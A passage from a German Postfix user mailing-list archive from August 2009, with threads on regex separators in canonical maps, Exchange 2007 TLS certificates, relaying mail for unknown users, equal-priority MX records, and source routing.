und vielen Dank, Markus -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 197 bytes Beschreibung: OpenPGP digital signature URL : From cite+postfix-buch at incertum.net Thu Aug 20 13:11:07 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Thu, 20 Aug 2009 13:11:07 +0200 Subject: [Postfixbuch-users] =?utf-8?q?Trennzeichen_f=C3=BCr_Canonical_Map?= =?utf-8?q?s_gesucht?= In-Reply-To: <4A8D2D2F.2060703@koeln.de> References: <4A8D2D2F.2060703@koeln.de> Message-ID: <20090820111107.GM17045@mail.incertum.net> * Markus Meyer : > ich möchte aus unserer Web-Applikation einen String vor jede E-Mail > Adresse anhängen, welcher dann auf den Mailservern via PCRE-Canonical > Maps raus gefiltert werden soll. Soll dann so im mail.log stehen: > > to=, orig_to=<9in38--iasimov at beispiel.de> > > Der String setzt sich wie folgt zusammen: /[:alnum:]{1,8}/ > D.h. in der Canonical Map steht dann: > /^([[:alnum:]]{1,8}--)(.*)/ $2 > > Hier habe ich '--' als Trenner benutzt. Aber ich denke das dies nicht > die beste Wahl ist. Wollte mal fragen, was man hier am Besten nehmen sollte? Du könntest den String einfach dahinter hängen und durch ein "+" trennen (dabei recipient_delimiter = + setzen) - allerdings nur, wenn die Mails alle an Deinen eigenen Zielserver gehen. Ansonsten kenne ich eine ganze Menge Leute, die gerne "geplusste" Adressen verwenden würden, dies aber nicht tun, weil zu viele Webinterfaces gaga sind und die deswegen "---" benutzen. Das hat zwar nicht direkt was mit Deinem Problem zu tun, aber es zeigt, daß die wohl selten über Adressen mit "---" stolpern. Ansonsten kannst Du den String ja Eindeutig gestalten, so daß Du sicher sein kannst, mit der PCRE wirklich nur den legitimen Teil abschneidet. Statt Trenner also matchen auf den Anfang der Adresse. > Kann vielleicht jemand abschätzen wie sich das auf die Performance bei > etwa 20k E-Mails pro Stunde auswirkt? Vielleicht sind ja Regexp-Tabellen > sogar schneller? Das dürfte mit beiden Tabellenarten einfach mal überhaupt nicht auffallen. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 Resistance is Futile, You Will be Distributed From Ralf.Hildebrandt at charite.de Thu Aug 20 13:31:44 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 20 Aug 2009 13:31:44 +0200 Subject: [Postfixbuch-users] =?utf-8?q?Trennzeichen_f=C3=BCr_Canonical_Map?= =?utf-8?q?s_gesucht?= In-Reply-To: <4A8D2D2F.2060703@koeln.de> References: <4A8D2D2F.2060703@koeln.de> Message-ID: <20090820113143.GG28851@charite.de> * Markus Meyer : > Aloha liebe Leute, > > ich möchte aus unserer Web-Applikation einen String vor jede E-Mail > Adresse anhängen, welcher dann auf den Mailservern via PCRE-Canonical > Maps raus gefiltert werden soll. Soll dann so im mail.log stehen: > > to=, orig_to=<9in38--iasimov at beispiel.de> > > Der String setzt sich wie folgt zusammen: /[:alnum:]{1,8}/ > D.h. in der Canonical Map steht dann: > /^([[:alnum:]]{1,8}--)(.*)/ $2 Besser (weil weniger () und anchored): /^[[:alnum:]]{1,8}--(.*)@beispiel.de$/ $1 at beispiel.de > Hier habe ich '--' als Trenner benutzt. Aber ich denke das dies nicht > die beste Wahl ist. Wollte mal fragen, was man hier am Besten nehmen sollte? drei x? drei "_"? Ist völlig Wurst. Manche Mailer mögen "+" nicht, manche "-" nicht. Ergo beides vermeiden. Wie wär's mit 0xdeadbeef oder so? > Kann vielleicht jemand abschätzen wie sich das auf die Performance bei > etwa 20k E-Mails pro Stunde auswirkt? Vielleicht sind ja Regexp-Tabellen > sogar schneller? Musst Du testen, aber ich glaube das macht nicht wirklich viel aus. -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From markus.meyer at koeln.de Thu Aug 20 13:52:05 2009 From: markus.meyer at koeln.de (Markus Meyer) Date: Thu, 20 Aug 2009 13:52:05 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Trennzeichen_f=FCr_Canonical_M?= =?iso-8859-1?q?aps_gesucht?= In-Reply-To: <20090820113143.GG28851@charite.de> References: <4A8D2D2F.2060703@koeln.de> <20090820113143.GG28851@charite.de> Message-ID: <4A8D38E5.40301@koeln.de> Ralf Hildebrandt schrieb: Hola Ralf, > Besser (weil weniger () und anchored): > > /^[[:alnum:]]{1,8}--(.*)@beispiel.de$/ $1 at beispiel.de Hier müßte ich das so machen: /^[[:alnum:]]{1,8}--(.*)/ $1 Da wir an zu viele unterschiedliche Adressen schicken. > drei x? drei "_"? Ist völlig Wurst. Manche Mailer mögen "+" nicht, manche > "-" nicht. Ergo beides vermeiden. Wie wär's mit 0xdeadbeef oder so? HeHe, jep. Habe so eindimensional gedacht ;) Mir fällt bestimmt was nettes ein. > Musst Du testen, aber ich glaube das macht nicht wirklich viel aus. Ok, da wir noch Luft auf den Kisten haben, bin ich jetzt beruhigter. dank, Markus -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 197 bytes Beschreibung: OpenPGP digital signature URL : From markus.meyer at koeln.de Thu Aug 20 13:53:54 2009 From: markus.meyer at koeln.de (Markus Meyer) Date: Thu, 20 Aug 2009 13:53:54 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Trennzeichen_f=FCr_Canonical_M?= =?iso-8859-1?q?aps_gesucht?= In-Reply-To: <20090820111107.GM17045@mail.incertum.net> References: <4A8D2D2F.2060703@koeln.de> <20090820111107.GM17045@mail.incertum.net> Message-ID: <4A8D3952.8040700@koeln.de> Stefan Förster schrieb: > Du könntest den String einfach dahinter hängen und durch ein "+" > trennen (dabei recipient_delimiter = + setzen) - allerdings nur, wenn > die Mails alle an Deinen eigenen Zielserver gehen. Gehen ins wilde Internetz. > Ansonsten kannst Du den String ja Eindeutig gestalten, so daß Du > sicher sein kannst, mit der PCRE wirklich nur den legitimen Teil > abschneidet. Statt Trenner also matchen auf den Anfang der Adresse. Geht leider nicht, da es zu viele unterschiedliche Adressen und Provider sind. > Das dürfte mit beiden Tabellenarten einfach mal überhaupt nicht > auffallen. Fein fein ... Danke, Markus -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 197 bytes Beschreibung: OpenPGP digital signature URL : From Ralf.Hildebrandt at charite.de Thu Aug 20 14:04:23 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 20 Aug 2009 14:04:23 +0200 Subject: [Postfixbuch-users] =?utf-8?q?Trennzeichen_f=C3=BCr_Canonical_Map?= =?utf-8?q?s_gesucht?= In-Reply-To: <4A8D38E5.40301@koeln.de> References: <4A8D2D2F.2060703@koeln.de> <20090820113143.GG28851@charite.de> <4A8D38E5.40301@koeln.de> Message-ID: <20090820120423.GK28851@charite.de> * Markus Meyer : > Ralf Hildebrandt schrieb: > > Hola Ralf, > > > Besser (weil weniger () und anchored): > > > > /^[[:alnum:]]{1,8}--(.*)@beispiel.de$/ $1 at beispiel.de > > Hier müßte ich das so machen: > > /^[[:alnum:]]{1,8}--(.*)/ $1 Aber das @ fehlt :) -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From markus.meyer at koeln.de Thu Aug 20 14:11:49 2009 From: markus.meyer at koeln.de (Markus Meyer) Date: Thu, 20 Aug 2009 14:11:49 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Trennzeichen_f=FCr_Canonical_M?= =?iso-8859-1?q?aps_gesucht?= In-Reply-To: <20090820120423.GK28851@charite.de> References: <4A8D2D2F.2060703@koeln.de> <20090820113143.GG28851@charite.de> <4A8D38E5.40301@koeln.de> <20090820120423.GK28851@charite.de> Message-ID: <4A8D3D85.5020600@koeln.de> Ralf Hildebrandt schrieb: >> Hier müßte ich das so machen: >> >> /^[[:alnum:]]{1,8}--(.*)/ $1 > > Aber das @ fehlt :) > ??? Da kommt rein 7837h2--heino at sumsum.de oder jawe83h3--bienchen at sonne.de. Alles unterschiedliche User und Domänen. Wo soll ich dann das @ in der RegEx einbauen? -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 197 bytes Beschreibung: OpenPGP digital signature URL : From Ralf.Hildebrandt at charite.de Thu Aug 20 14:32:31 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 20 Aug 2009 14:32:31 +0200 Subject: [Postfixbuch-users] =?utf-8?q?Trennzeichen_f=C3=BCr_Canonical_Map?= =?utf-8?q?s_gesucht?= In-Reply-To: <4A8D3D85.5020600@koeln.de> References: <4A8D2D2F.2060703@koeln.de> <20090820113143.GG28851@charite.de> <4A8D38E5.40301@koeln.de> <20090820120423.GK28851@charite.de> <4A8D3D85.5020600@koeln.de> Message-ID: <20090820123231.GQ28851@charite.de> * Markus Meyer : > Ralf Hildebrandt schrieb: > >> Hier müßte ich das so machen: > >> > >> /^[[:alnum:]]{1,8}--(.*)/ $1 > > > > Aber das @ fehlt :) > > > > ??? > Da kommt rein 7837h2--heino at sumsum.de oder jawe83h3--bienchen at sonne.de. > Alles unterschiedliche User und Domänen. Wo soll ich dann das @ in der > RegEx einbauen? /^[[:alnum:]]{1,8}--(.+ at .+)$/ $1 -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From markus.meyer at koeln.de Thu Aug 20 14:54:11 2009 From: markus.meyer at koeln.de (Markus Meyer) Date: Thu, 20 Aug 2009 14:54:11 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Trennzeichen_f=FCr_Canonical_M?= =?iso-8859-1?q?aps_gesucht?= In-Reply-To: <20090820123231.GQ28851@charite.de> References: <4A8D2D2F.2060703@koeln.de> <20090820113143.GG28851@charite.de> <4A8D38E5.40301@koeln.de> <20090820120423.GK28851@charite.de> <4A8D3D85.5020600@koeln.de> <20090820123231.GQ28851@charite.de> Message-ID: <4A8D4773.9080707@koeln.de> Ralf Hildebrandt schrieb: > * Markus Meyer : >> ??? >> Da kommt rein 7837h2--heino at sumsum.de oder jawe83h3--bienchen at sonne.de. >> Alles unterschiedliche User und Domänen. Wo soll ich dann das @ in der >> RegEx einbauen? > > /^[[:alnum:]]{1,8}--(.+ at .+)$/ $1 *#%)(#&_%)&_%#&! *schlagmitkopfauftisch* RegExe sind einfach nix für meinen Kopf *stöhn* Markus bedankt sich nochmals ;) -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 197 bytes Beschreibung: OpenPGP digital signature URL : From ffiene at veka.com Thu Aug 20 16:06:58 2009 From: ffiene at veka.com (Frank Fiene) Date: Thu, 20 Aug 2009 16:06:58 +0200 Subject: [Postfixbuch-users] Postfix mit selbstsigniertem TLS-Zertifikat und Exchange 2007 Message-ID: Wer kann mir helfen? Ich habe einen Postfix-Server mit selbstsigniertem TLS-Zertifikat und möchte mit einem Exchange 2007 über den relayen. Ich habe dazu die CA in den TrustedCA-Store auf der Windows-Büchse installiert und auch das Zertifikat selber in den Personal store. Es erscheinen aber immer noch die Fehlermeldungen (mail.domain.de ist natürlich nicht echt, aber der richtige FQDN stimmt mit dem Zertifikat überein): Microsoft Exchange couldn't find a certificate that contains the domain name mail.domain.de in the personal store on the local computer. Therefore, it is unable to support the STARTTLS SMTP verb for the connector VEKA AG with a FQDN parameter of mail.domain.de. If the connector's FQDN is not specified, the computer's FQDN is used. Verify the connector configuration and the installed certificates to make sure that there is a certificate with a domain name for that FQDN. If this certificate exists, run Enable-ExchangeCertificate - Services SMTP to make sure that the Microsoft Exchange Transport service has access to the certificate key. und Unable to validate the TLS certificate of the smart host for the connector VEKA AG. The certificate validation error for the certificate is UntrustedRoot. If the problem persists, contact the administrator of the smart host to resolve the problem. Hilfe! -- Frank Fiene / IT-Services Internet Services / IT-Security Fon: +49 2526 29-6200 Fax: +49 2526 29-16-6200 mailto: ffiene at veka.com http://www.veka.com VEKA AG Dieselstr. 8 48324 Sendenhorst Deutschland/Germany Vorstand/Executive Board: Andreas Hartleif (Vorsitzender/CEO), Dr. Andreas W. Hillebrand, Bonifatius Eichwald, Elke Hartleif, Dr. Werner Schuler, Vorsitzender des Aufsichtsrates/Chairman of Supervisory Board: Ulrich Weimer HRB 8282 AG Münster/District Court of Münster From Rainer.Wiesenfarth at inpho.de Thu Aug 20 17:56:07 2009 From: Rainer.Wiesenfarth at inpho.de (Rainer Wiesenfarth) Date: Thu, 20 Aug 2009 17:56:07 +0200 Subject: [Postfixbuch-users] Postfix mit selbstsigniertem TLS-Zertifikat undExchange 2007 In-Reply-To: Message-ID: From: postfixbuch-users-bounces at listen.jpberlin.de > [...] > Ich habe dazu die CA in den TrustedCA-Store auf der Windows-Büchse > installiert und auch das Zertifikat selber in den Personal store. > > Es erscheinen aber immer noch die Fehlermeldungen > (mail.domain.de ist > natürlich nicht echt, aber der richtige FQDN stimmt mit dem > Zertifikat > überein): > > Microsoft Exchange couldn't find a certificate that contains the > domain name mail.domain.de in the personal store on the local > computer. [...] Ohne mich wirklich mit dem ganzen Windows-Zertifikate-Zeug auszukennen ein Schuss ins Blaue: Ist der "personal store", in den Du installiert hast der selbe "personal store", in dem Exchange sucht? Die sind doch meines Wissens Benutzer bezogen ... Und zum Überfluss noch ein zweiter Schuss: Passen "Zertifizierungspfad" und "Zertifizierungszwecke"? Best Regards / Mit freundlichen Grüßen Rainer Wiesenfarth -- INPHO GmbH * Smaragdweg 1 * 70174 Stuttgart * Germany phone: +49 711 2288 10 * fax: +49 711 2288 111 * web: www.inpho.de place of business: Stuttgart * managing director: Johannes Saile commercial register: Stuttgart, HRB 9586 Leader in Photogrammetry and Digital Surface Modelling -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3438 bytes Beschreibung: nicht verfügbar URL : From ffiene at veka.com Thu Aug 20 19:10:16 2009 From: ffiene at veka.com (Frank Fiene) Date: Thu, 20 Aug 2009 19:10:16 +0200 Subject: [Postfixbuch-users] Postfix mit selbstsigniertem TLS-Zertifikat undExchange 2007 In-Reply-To: References: Message-ID: Am 20.08.2009 um 17:56 schrieb Rainer Wiesenfarth: > > From: postfixbuch-users-bounces at listen.jpberlin.de >> [...] >> Ich habe dazu die CA in den TrustedCA-Store auf der Windows-Büchse >> installiert und auch das Zertifikat selber in den Personal store. >> >> Es erscheinen aber immer noch die Fehlermeldungen >> (mail.domain.de ist >> natürlich nicht echt, aber der richtige FQDN stimmt mit dem >> Zertifikat >> überein): >> >> Microsoft Exchange couldn't find a certificate that contains the >> domain name mail.domain.de in the personal store on the local >> computer. [...] > > Ohne mich wirklich mit dem ganzen Windows-Zertifikate-Zeug > auszukennen ein > Schuss ins Blaue: Ist der "personal store", in den Du installiert > hast der > selbe "personal store", in dem Exchange sucht? Die sind doch meines > Wissens > Benutzer bezogen ... Ja, das habe ich auch schon vermutet, aber wie stelle ich das fest? Ich bin als Administrator angemeldet! Nimmt der dann den richtigen? > Und zum Überfluss noch ein zweiter Schuss: Passen > "Zertifizierungspfad" und > "Zertifizierungszwecke"? Das müsste passen. Das ist eher ein Windows-Problem, denke ich! Danke schon mal! -- Frank Fiene / IT-Services Internet Services / IT-Security Fon: +49 2526 29-6200 Fax: +49 2526 29-16-6200 mailto: ffiene at veka.com http://www.veka.com VEKA AG Dieselstr. 8 48324 Sendenhorst Deutschland/Germany Vorstand/Executive Board: Andreas Hartleif (Vorsitzender/CEO), Dr. Andreas W. Hillebrand, Bonifatius Eichwald, Elke Hartleif, Dr. Werner Schuler, Vorsitzender des Aufsichtsrates/Chairman of Supervisory Board: Ulrich Weimer HRB 8282 AG Münster/District Court of Münster From sp_rinter at gmx.de Thu Aug 20 19:53:11 2009 From: sp_rinter at gmx.de (Dirk Verwiebe) Date: Thu, 20 Aug 2009 19:53:11 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mails_f=FCr_nicht_existierende?= =?iso-8859-1?q?_User_einer_virtuellen_Mailtable_an_anderen_Mailserver_=FC?= =?iso-8859-1?q?bergeben?= In-Reply-To: <4A55D37F.5010000@thomasschwenski.de> References: <20090709111603.248820@gmx.net> <4A55D37F.5010000@thomasschwenski.de> Message-ID: <4A8D8D87.3030802@gmx.de> Mittlerweile funktioniert der Mailserver wie gewünscht. Ich mußte allerdings alle Benutzer des anderen Mailservers in der Virtual Alias Tabelle anlegen. Ohne diese Einträge werden Mails an die User auf dem anderen Server gar nicht erst angenommen und der transport_maps Eintrag wird ignoriert. Waren nur knapp 400 Adressen. ;) Dumm an dieser Lösung ist daß ich immer nachfragen muß ob neue Benutzer auf dem anderen Server angelegt wurden und ich die von Hand nachtragen muß. Optimal wäre, wenn alle Emails an Benutzer die nicht auf meinem Server existieren(die in der gleichen Domäne), an den anderen Server weitergereicht werden. Grüße Dirk > Hallo Dirk, > > Dirk Verwiebe schrieb: > >> Hallo, >> ist es möglich Postfix so zu konfigurieren das Mails an Benutzer die nicht in der virtuellen Mailtabelle angelegt sind an einen anderen Mailserver übergibt ? Im Prinzip wie ein catchall account auf smtp:[xx.xx.xx.xx] >> Z.B >> aaaa. at example.de >> bbbb. at example.de -> anderer Mailserver gleiche Domäne >> cccc. at example.de >> dddd. at example.de -> anderer Mailserver gleiche Domäne >> eeee. at example.de >> ffff. at example.de -> anderer Mailserver gleiche Domäne >> > > Ja es ist mittels transport-map machbar. > Kennt dieser Mailserver denn alle Benutzernamen des anderen? > Das wäre optimal, ist aber nicht zwingend erforderlich, falls wirklich > Catch-All gefordert wäre. > Ließe sich das vermeiden, dann wäre es aber besser. > > Thomas > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > > From matthiasebner at yahoo.de Thu Aug 20 20:05:35 2009 From: matthiasebner at yahoo.de (Matthias Ebner) Date: Thu, 20 Aug 2009 20:05:35 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mails_f=FCr_nicht_existierende?= =?iso-8859-1?q?_User_einer_virtuellen_Mailtable_an_anderen_Mailser?= =?iso-8859-1?q?ver_=FCbergeben?= In-Reply-To: <4A8D8D87.3030802@gmx.de> Message-ID: <002501ca21c0$d1939cf0$0601a8c0@emnpc2> Dirk Verwiebe schrieb am Donnerstag, den 20. August 2009 > Waren nur knapp 400 Adressen. ;) Dumm an dieser Lösung ist > daß ich immer > nachfragen muß ob neue Benutzer auf dem anderen Server angelegt > wurden und ich die von Hand nachtragen muß. Bastel dir doch ein entsprechendes Script, was regelmäßig aufgerufen wird und das automatisch macht. Hab ich hier die Tage erst für zwei mySQL-basierte Systeme gemacht. > Optimal wäre, wenn alle > Emails an Benutzer die nicht auf meinem Server existieren(die in der > gleichen Domäne), an den anderen Server weitergereicht werden. In der Art will man das imho nicht wirklich haben ;-) Gruß Matthias From sp_rinter at gmx.de Thu Aug 20 20:23:23 2009 From: sp_rinter at gmx.de (Dirk Verwiebe) Date: Thu, 20 Aug 2009 20:23:23 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mails_f=FCr_nicht_existierende?= =?iso-8859-1?q?_User_einer_virtuellen_Mailtable_an_anderen_Mailserver_=FC?= =?iso-8859-1?q?bergeben?= In-Reply-To: <002501ca21c0$d1939cf0$0601a8c0@emnpc2> References: <002501ca21c0$d1939cf0$0601a8c0@emnpc2> Message-ID: <4A8D949B.2010908@gmx.de> Matthias Ebner schrieb: > Bastel dir doch ein entsprechendes Script, was regelmäßig aufgerufen wird > und das automatisch macht. > Hab ich hier die Tage erst für zwei mySQL-basierte Systeme gemacht. > Mit Nachfragen meinte ich die vorsintflutliche Methode, Telefonhörer in die Hand nehmen, wählen und die entsprechenden Laute artikulieren. ;-) >> Optimal wäre, wenn alle >> Emails an Benutzer die nicht auf meinem Server existieren(die in der >> gleichen Domäne), an den anderen Server weitergereicht werden. >> > > In der Art will man das imho nicht wirklich haben ;-) > > Ach, ich fände es ganz bequem."Mein" Mailserver hängt über einen VPN Tunnel an einem übergeordneten Mailsystem, und bekommt nur von Ungeziefer befreite Mails. Grüße Dirk > Gruß > Matthias > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > > From hostmaster at taunusstein.net Thu Aug 20 20:36:23 2009 From: hostmaster at taunusstein.net (Christian Felsing) Date: Thu, 20 Aug 2009 20:36:23 +0200 Subject: [Postfixbuch-users] Postfix mit selbstsigniertem TLS-Zertifikat und Exchange 2007 In-Reply-To: References: Message-ID: <4A8D97A7.5070404@taunusstein.net> Hallo Frank, wenn Exchange die gleiche CA Implementierung wie Windows Server 2003 hat, dann kann ich evtl. helfen. Bei W2k3 ist das jedenfalls so, dass die im Zertifikat angegebenen URLs, insbesondere für die CRLs geprüft werden. Das bedeutet, dass die W2K3 CA versucht, sich über die URL eine CRL zu ziehen. Das muss funktionieren, ansonsten weigert sich der CA Dienst zu starten. Nachdem das gefixt war, hat die Windows CA die mit OpenSSL erstellte CA akzeptiert. Die Implementierung sah also wie folgt aus: 1. Root CA mit OpenSSL erstellt, CRL erstellt und exportiert (war erstmal leer) 2. CRL auf Webserver kopiert, dessen URL aus Sicht von Windows auch funktioniert. http://my.ca.local/ca.crl ist im Zertifikat alsC CRL URL angegeben und Windows hatte Zugriff darauf. Das mit IE gleich getestet. 3. Von OpenSSL signiertes CA Zertifikat importiert 4. Windows CA gestartet Im Logfile vom CRL Webserver fand sich im Log dann auch tatsächlich ein Zugriff vom Windows Server. Die CERT Hierarchie sieht wie folgt aus: My Root CA (mit OpenSSL erstellt) ! +-- Windows CA (W2K3 Server für Windows Welt) ! +-- Lotus Notes CA (für Lotus Notes Anwendungen) ! +-- Misc CA (auf OpenSSL Basis, auch für Postfix zuständig) Die Lösung funktioniert bisher einwandfrei Grüße Christian Frank Fiene schrieb: > Microsoft Exchange couldn't find a certificate that contains the domain > name mail.domain.de in the personal store on the local computer. From tobi at familiematthaeus.de Thu Aug 20 21:09:42 2009 From: tobi at familiematthaeus.de (Tobias Matthaeus) Date: Thu, 20 Aug 2009 21:09:42 +0200 Subject: [Postfixbuch-users] Zwei MXe, beide Prio 10? Message-ID: <4A8D9F76.8040407@familiematthaeus.de> Hallo liebe Leute, neulich habe ich ja schon einmal eine E-Mail zu diesem Thema geschrieben. Nun habe ich aber nochmal eine Nachfrage. Es geht aber leicht mit in eine andere Richtung, daher eröffne ich ein neues Thema. Ich habe zwei gleiche MX-Server, die für die SPAM Prüfung zuständig sind. Beide sind komplett gleich konfiguriert, was User und SPAM-Verarbeitung angeht. Also ist es quasi egal, ob man auf mx1 oder mx2 einliefert. Auf Raten dieser Liste habe ich beide MXe mit Prio10 im NameServer definiert. Es ist jetzt heute der MX1 leider ein wenig ausgefallen. Unter anderem auch, weil er auf neue Hardware umgezogen ist. Aber es sind nur ganz wenig E-Mails wirklich über den mx2 eingeliefert worden. Woran kann das liegen? Sollte ich vielleicht doch lieber auf eine PRIO10 und PRIO20 Struktur zurückgreifen? -- Mit den besten Grüßen, Tobias Matthaeus ------------------------------------------------------- Foehrenstr. 56 ~ 28207 Bremen tel +49.421.684 17 68 ~ mobil +49.176.49 22 28 60 From postfixbuch-users at drobic.de Thu Aug 20 21:17:26 2009 From: postfixbuch-users at drobic.de (Sandy Drobic) Date: Thu, 20 Aug 2009 21:17:26 +0200 Subject: [Postfixbuch-users] Zwei MXe, beide Prio 10? In-Reply-To: <4A8D9F76.8040407@familiematthaeus.de> References: <4A8D9F76.8040407@familiematthaeus.de> Message-ID: <4A8DA146.6010400@drobic.de> Tobias Matthaeus wrote: > Hallo liebe Leute, > > > > neulich habe ich ja schon einmal eine E-Mail zu diesem Thema > geschrieben. Nun habe ich aber nochmal eine Nachfrage. > > Es geht aber leicht mit in eine andere Richtung, daher eröffne ich ein > neues Thema. > > > Ich habe zwei gleiche MX-Server, die für die SPAM Prüfung zuständig > sind. Beide sind komplett gleich konfiguriert, was User und > SPAM-Verarbeitung angeht. Also ist es quasi egal, ob man auf mx1 oder > mx2 einliefert. Gut! > > Auf Raten dieser Liste habe ich beide MXe mit Prio10 im NameServer > definiert. Es ist jetzt heute der MX1 leider ein wenig ausgefallen. > Unter anderem auch, weil er auf neue Hardware umgezogen ist. Aber es > sind nur ganz wenig E-Mails wirklich über den mx2 eingeliefert worden. > > Woran kann das liegen? Sollte ich vielleicht doch lieber auf eine PRIO10 > und PRIO20 Struktur zurückgreifen? Das sollte keinen Unterschied machen. Entweder die einliefernden Server haben das DNS-Update nicht mitbekommen oder die DNS-Einträge sind vergurkt. Hast du geprüft, dass die MX-Einträge von außen sichtbar sind? -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@)drobic (.) de From postfixbuch-users at drobic.de Thu Aug 20 21:20:50 2009 From: postfixbuch-users at drobic.de (Sandy Drobic) Date: Thu, 20 Aug 2009 21:20:50 +0200 Subject: [Postfixbuch-users] =?utf-8?q?Mails_f=C3=BCr_nicht_existierende_U?= =?utf-8?q?ser_einer_virtuellen_Mailtable_an_anderen_Mailserver_=C3=BCberg?= =?utf-8?q?eben?= In-Reply-To: <4A8D8D87.3030802@gmx.de> References: <20090709111603.248820@gmx.net> <4A55D37F.5010000@thomasschwenski.de> <4A8D8D87.3030802@gmx.de> Message-ID: <4A8DA212.9050908@drobic.de> Dirk Verwiebe wrote: > Mittlerweile funktioniert der Mailserver wie gewünscht. > Ich mußte allerdings alle Benutzer des anderen Mailservers in der > Virtual Alias Tabelle anlegen. Ohne diese Einträge werden Mails > an die User auf dem anderen Server gar nicht erst angenommen und der > transport_maps Eintrag wird ignoriert. > Waren nur knapp 400 Adressen. ;) Dumm an dieser Lösung ist daß ich immer > nachfragen muß ob neue Benutzer auf dem anderen Server angelegt > wurden und ich die von Hand nachtragen muß. Optimal wäre, wenn alle > Emails an Benutzer die nicht auf meinem Server existieren(die in der > gleichen Domäne), an den anderen Server weitergereicht werden. Du hast zwei Möglichkeiten: - entweder du suchst eine Methode, die gültigen Adressen automatisiert vom Backend-Server zu extrahieren per Script oder Abfrage - oder du setzt die Domains mit Recipient-Verification auf. Dann fragt das Postfix-Relay erst beim Backend nach, ob dieses die Empfängeradresse akzeptiert. Dies setzt voraus, dass der Backendserver während der RCPT TO-Phase des SMTP-Dialoges einen ungültigen Empfänger abweist. http://www.postfix.org/ADDRESS_VERIFICATION_README.html#recipient -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@)drobic (.) de From sebastian.opitz at gmx.net Fri Aug 21 14:03:38 2009 From: sebastian.opitz at gmx.net (Sebastian Opitz) Date: Fri, 21 Aug 2009 14:03:38 +0200 Subject: [Postfixbuch-users] Off-Topic: Source Routing Message-ID: <1250856218.5034.25.camel@alf> Ich hab da noch mal eine Frage zum Source Routing. Konkret geht es um die Verwendung des folgenden Befehlsaufruf: /usr/ucb/Mail -s Testmail -r tec at intern-domain.de sebastian.opitz% gmx.net at INTERNET.RELAY.INTERN-DOMAIN.DE < $TEXT Wird der genannte Befehl inkl. der Optionen "abgefeuert" wird der Namensanteil INTERNET.RELAY.INTERN-DOMAIN.DE in den zugehörigen DNS Servernamen (RELAY0815.INTERN-DOMAIN.DE) umgewandelt. (Info: Es handelt sich beim genannten Namensanteil um einen DNS Alias) Der Versand erfolgt also nicht mehr wie ganz oben beschrieben (gewünscht), sondern so: /usr/ucb/Mail -s Testmail -r tec at intern-domain.de sebastian.opitz% gmx.net at RELAY0815.INTERN-DOMAIN.DE < $TEXT Frage: Wieso wird während des Versandes der DNS Name noch einmal aufgelöst. Liegt es daran, dass es sich bei der adressierten Route INTERNET.RELAY.INTERN-DOMAIN.DE um einen DNS Alias handelt und nicht den originären DNS Namen des Relays? Wenn ja, wie kann ich das Verhalten abschalten und erwirken das beim Versand mittels Source Routing der Name INTERNET.RELAY.INTERN-DOMAIN.DE 1-zu-1 ohne Umschreibung an das gewünschte Relay übergeben wird? Vielen Dank für Eure Tips! Sebastian From cite+postfix-buch at incertum.net Fri Aug 21 14:17:57 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 21 Aug 2009 14:17:57 +0200 Subject: [Postfixbuch-users] Off-Topic: Source Routing In-Reply-To: <1250856218.5034.25.camel@alf> References: <1250856218.5034.25.camel@alf> Message-ID: <20090821121757.GT17045@mail.incertum.net> Hallo Sebastian, * Sebastian Opitz : > Ich hab da noch mal eine Frage zum Source Routing. Konkret geht es um > die Verwendung des folgenden Befehlsaufruf: > > /usr/ucb/Mail -s Testmail -r tec at intern-domain.de sebastian.opitz% > 